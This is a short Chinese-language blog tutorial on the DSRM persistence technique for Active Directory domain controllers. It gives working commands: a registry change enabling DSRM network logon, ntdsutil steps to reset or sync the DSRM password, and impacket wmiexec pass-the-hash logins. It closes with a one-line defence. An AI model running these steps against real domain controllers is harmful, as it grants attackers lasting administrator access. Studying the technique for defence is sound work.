1.前言

今天看了內網加固方面的知識，發現了一個加固方案是針對DSRM攻擊的，於是就查了一下什麼是DSRM攻擊，因此有了這篇文章。

2.原理

域控上有個賬戶，名字為目錄服務還原模式賬戶又名DSRM賬戶，它的密碼是安裝DC的時候設定的，一般不會修改。但是當DSRM賬戶被修改的時候，域控的本地管理員administrator賬戶密碼的hash也會被修改，並且與DSRM賬戶的hash是一樣的。這時候即使再次修改了本地管理員administrator賬戶的明文密碼，sam檔案的hash也不會更改，只會更改ntds.dit檔案中的hash。

綜上，意味著只要我們能夠更改DSRM的賬號密碼，我們就能夠通過DSRM的密碼的hash登陸域控主機，並且即使域控主機的本地管理員密碼改變了，管理員的hash也不會變，我們依舊可以利用pth攻擊來登陸。

3.實現

3.1 更改DSRM明文密碼

1.更改登錄檔：

reg add HKLM\System\CurrentControlSet\Control\Lsa  /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

2.更改dsrm密碼,以此輸入一下命令。

ntdsutil
set dsrm password 
reset password on server null 
111 
111 
q 
q

3.在其他機器上利用impacket工具進行連線：

wmiexec.exe yukong/administrator:111@192.168.124.142  #yukong是hostname
wmiexec.exe -hashes :75f1d23f3a2527c6bfaada3e93b32a8b yukong/administrator@192.168.124.142

3.2 利用域內其他使用者的hash去同步DSRM的密碼

ntdsutil
set dsrm password 
sync from domain account zhangsan #可以將zhangsan改為其他任意使用者的使用者名稱
q 
q

上述命令會將域控的本地管理員賬戶的hash與明文同步為域內的zhangsan的明文hash。

4.防禦方法

刪除HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior鍵值。

參考文章

巧用DSRM密碼同步將域控許可權持久化
域滲透-許可權維持之 DSRM